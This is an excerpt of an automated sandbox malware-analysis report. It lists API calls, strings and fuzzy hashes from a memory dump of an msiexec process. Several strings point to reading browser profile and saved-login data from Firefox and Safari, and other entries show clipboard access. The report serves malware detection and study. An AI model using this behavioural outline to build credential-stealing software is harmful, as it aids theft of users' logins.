  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
  • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
• String ID:
• API String ID: 3655998216-0
• Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
• Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
• Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
• Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659

APIs
• memset.MSVCRT ref: 00445426
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
• String ID:
• API String ID: 1828521557-0
• Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
• Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
• Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
• Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9

APIs
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
  • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
• memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@FilePointermemcpy
• String ID:
• API String ID: 609303285-0
• Opcode ID: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
• Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
• Opcode Fuzzy Hash: 9e8b65249caf6329f4b4caa46943be568ceb14fc1399993bad7d332d27558272
• Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: _wcsicmp
• String ID:
• API String ID: 2081463915-0
• Opcode ID: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
• Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
• Opcode Fuzzy Hash: 8ecd19cd50b91feb9ece7647b88d70c74935930258f67524a15d6916c2203edb
• Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68

APIs
  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastRead
• String ID:
• API String ID: 2136311172-0
• Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
• Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
• Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
• Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E

APIs
  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
• ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@??3@
• String ID:
• API String ID: 1936579350-0
• Opcode ID: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
• Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
• Opcode Fuzzy Hash: 89281d6a79f9a2f09b4aea459eeecc0a1f6d8faaa22ddda06fad7d30ca0037ac
• Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
• Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
• Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
• Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18

APIs
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
• Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
• Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
• Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
• Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E

APIs
• EmptyClipboard.USER32 ref: 004098EC
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
• GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
• GlobalLock.KERNEL32(00000000), ref: 00409927
• ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
• GlobalUnlock.KERNEL32(00000000), ref: 0040994C
• SetClipboardData.USER32(0000000D,00000000), ref: 00409955
• GetLastError.KERNEL32 ref: 0040995D
• CloseHandle.KERNEL32(?), ref: 00409969
• GetLastError.KERNEL32 ref: 00409974
• CloseClipboard.USER32 ref: 0040997D
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
• String ID:
• API String ID: 3604893535-0
• Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
• Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
• Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
• Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
APIs
• LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
• GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
• FreeLibrary.KERNEL32(00000000), ref: 004044E9
• MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: Library$AddressFreeLoadMessageProc
• String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
• API String ID: 2780580303-317687271
• Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
• Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
• Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
• Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
APIs
• GetSystemTime.KERNEL32(?), ref: 00418836
• memcpy.MSVCRT(?,?,00000010), ref: 00418845
• GetCurrentProcessId.KERNEL32 ref: 00418856
• memcpy.MSVCRT(?,?,00000004), ref: 00418869
• GetTickCount.KERNEL32 ref: 0041887D
• memcpy.MSVCRT(?,?,00000004), ref: 00418890
• QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
• memcpy.MSVCRT(?,?,00000008), ref: 004188B6
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
• String ID:
• API String ID: 4218492932-0
• Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
• Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
• Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
• Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
APIs
• EmptyClipboard.USER32 ref: 00409882
• wcslen.MSVCRT ref: 0040988F
• GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
• GlobalLock.KERNEL32(00000000), ref: 004098AC
• memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
• GlobalUnlock.KERNEL32(00000000), ref: 004098BE
• SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
• CloseClipboard.USER32 ref: 004098D7
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
• String ID:
• API String ID: 1213725291-0
• Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
• Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
• Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
• Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
APIs
• GetLastError.KERNEL32 ref: 004182D7
  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
• FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
• FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
• LocalFree.KERNEL32(?), ref: 00418342
• free.MSVCRT ref: 00418370
  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,74DEDF80,?,0041755F,?), ref: 00417452
  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
Strings
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
• String ID: OsError 0x%x (%u)
• API String ID: 2360000266-2664311388
• Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
• Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
• Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
• Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
APIs
  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
  • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
• OpenClipboard.USER32(?), ref: 00411878
• GetLastError.KERNEL32 ref: 0041188D
  • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
  • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
  • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
  • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
  • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
  • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
  • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
  • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
  • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
• String ID:
• API String ID: 2628231878-0
• Opcode ID: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
• Instruction ID: 30b21b9b2413019ae2959f490c9fe9c3e0a1eb79cd5a134b572bdad6ddd06780
• Opcode Fuzzy Hash: 0cde1a455cb318c00b32f556f5e8c7a3ba143a63badd7d8bcbff79f11634fc9a
• Instruction Fuzzy Hash: C7F0A4367003006BEA203B729C4EFDB379DAB80710F04453AB965A62E2DE78EC818518
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: ??2@??3@memcpymemset
• String ID:
• API String ID: 1865533344-0
• Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
• Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
• Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
• Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
APIs
• GetVersionExW.KERNEL32(?), ref: 004173BE
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: Version
• String ID:
• API String ID: 1889659487-0
• Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
• Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
• Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
• Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
APIs
• NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
Memory Dump Source
• Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
Similarity
• API ID: NtdllProc_Window
APIs
• _wcsicmp.MSVCRT ref: 004022A6
• _wcsicmp.MSVCRT ref: 004022D7
• _wcsicmp.MSVCRT ref: 00402305
• _wcsicmp.MSVCRT ref: 00402333
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
• memset.MSVCRT ref: 0040265F
• memcpy.MSVCRT(?,?,00000011), ref: 0040269B
  • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
  • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
• memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
• LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
• FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
Similarity
• API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
• String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
Similarity
• API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
• String ID: :stringdata$ftp://$http://$https://
APIs
• GetDlgItem.USER32(?,000003E9), ref: 0041402F
• GetDlgItem.USER32(?,000003E8), ref: 0041403B
• GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
• GetWindowLongW.USER32(?,000000F0), ref: 00414056
• GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
• GetWindowLongW.USER32(?,000000EC), ref: 0041406B
• GetWindowRect.USER32(00000000,?), ref: 0041407D
• GetWindowRect.USER32(?,?), ref: 00414088
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
• GetDC.USER32 ref: 004140E3
• wcslen.MSVCRT ref: 00414123
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
• ReleaseDC.USER32(?,?), ref: 00414181
• _snwprintf.MSVCRT ref: 00414244
• SetWindowTextW.USER32(?,?), ref: 00414258
• SetWindowTextW.USER32(?,00000000), ref: 00414276
• GetDlgItem.USER32(?,00000001), ref: 004142AC
• GetWindowRect.USER32(00000000,?), ref: 004142BC
• MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
• GetClientRect.USER32(?,?), ref: 004142E1
• GetWindowRect.USER32(?,?), ref: 004142EB
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
• GetClientRect.USER32(?,?), ref: 0041433B
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
Similarity
• API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
• String ID: %s:$EDIT$STATIC
APIs
• EndDialog.USER32(?,?), ref: 00413221
• GetDlgItem.USER32(?,000003EA), ref: 00413239
• SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
• SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
• memset.MSVCRT ref: 00413292
• memset.MSVCRT ref: 004132B4
• memset.MSVCRT ref: 004132CD
• memset.MSVCRT ref: 004132E1
• memset.MSVCRT ref: 004132FB
• memset.MSVCRT ref: 00413310
• GetCurrentProcess.KERNEL32 ref: 00413318
• ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
• ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
• memset.MSVCRT ref: 004133C0
• GetCurrentProcessId.KERNEL32 ref: 004133CE
• memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
• wcscpy.MSVCRT ref: 0041341F
• _snwprintf.MSVCRT ref: 0041348E
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
• GetDlgItem.USER32(?,000003EA), ref: 004134B0
• SetFocus.USER32(00000000), ref: 004134B7
Strings
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
• {Unknown}, xrefs: 004132A6
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
APIs
• GetDlgItem.USER32(?,000003EC), ref: 004011F0
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
• GetDlgItem.USER32(?,000003EE), ref: 00401238
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
• GetDlgItem.USER32(?,000003EC), ref: 00401273
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
• GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
• LoadCursorW.USER32(00000000,00000067), ref: 00401297
• SetCursor.USER32(00000000,?,?), ref: 0040129E
• GetDlgItem.USER32(?,000003EE), ref: 004012BF
• ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
• GetDlgItem.USER32(?,000003EC), ref: 004012E6
• SetBkMode.GDI32(?,00000001), ref: 004012F2
• SetTextColor.GDI32(?,00C00000), ref: 00401300
• GetSysColorBrush.USER32(0000000F), ref: 00401308
• GetDlgItem.USER32(?,000003EE), ref: 00401329
• EndDialog.USER32(?,?), ref: 0040135E
• DeleteObject.GDI32(?), ref: 0040136A
• GetDlgItem.USER32(?,000003ED), ref: 0040138F
• ShowWindow.USER32(00000000), ref: 00401398
• GetDlgItem.USER32(?,000003EE), ref: 004013A4
• ShowWindow.USER32(00000000), ref: 004013A7
• SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
• SetWindowTextW.USER32(?,00000000), ref: 004013CA
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
• SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00404172
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                • memset.MSVCRT ref: 00404200
                                                                                                                                                • memset.MSVCRT ref: 00404215
                                                                                                                                                • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                • memset.MSVCRT ref: 0040426E
                                                                                                                                                • memset.MSVCRT ref: 004042CD
                                                                                                                                                • memset.MSVCRT ref: 004042E2
                                                                                                                                                • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000D.00000002.2249587806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                • API String ID: 2454223109-1580313836
                                                                                                                                                • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
